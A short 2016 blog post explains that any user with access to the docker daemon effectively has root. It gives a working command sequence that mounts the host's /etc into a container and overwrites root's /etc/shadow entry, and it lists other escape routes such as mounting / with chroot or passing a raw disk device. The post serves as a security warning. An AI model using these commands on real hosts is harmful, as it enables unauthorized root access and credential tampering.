====== 2016-09-20 - root via docker ======

{{ :blog:2016:09:20:docker_logo.png?400|docker's logo}}

there are a lot of discussions regarding docker and its security features. there are two main aspects here:
  - can application, started as a non-root, inside a container, escape from it?
  - can we gain root access by having an access to docker?

in this post i'd like to quickly answer 2nd question. just try this one out:

<code bash>
docker run -it --rm -v /etc/:/mnt debian:stable
sed -i /mnt/shadow 's#^root:.*#root:YOUR_PROPERLY_ENCODED_PASSWORD_GOES_HERE:0:0:99999:7:::'
exit
su # type in your new password
</code>

and voila -- you're root now.

how does it work? it's simple -- we're mapping content of /etc/ from root filesystem (docker's daemon can access it) as /mnt inside our (temporary) container. inside the container, with root privileges, we edit //shadow// file, to set our own password.

is it the only way to go? definitely NO! some more examples follow:

  * map the whole / to /mnt and do //chroot// into there -- root there is!
  * export device with a filesystem to a container (eg. //--device=/dev/sda//) and mount/hex-edit it there -- and root there is!
  * map any directory you want to /mnt and just steal/change what you need w/o leaving additional traces.

...and probably many more, alike. i think you get the point.

**long story short -- giving any user access to docker daemon means effectively giving her a root access.**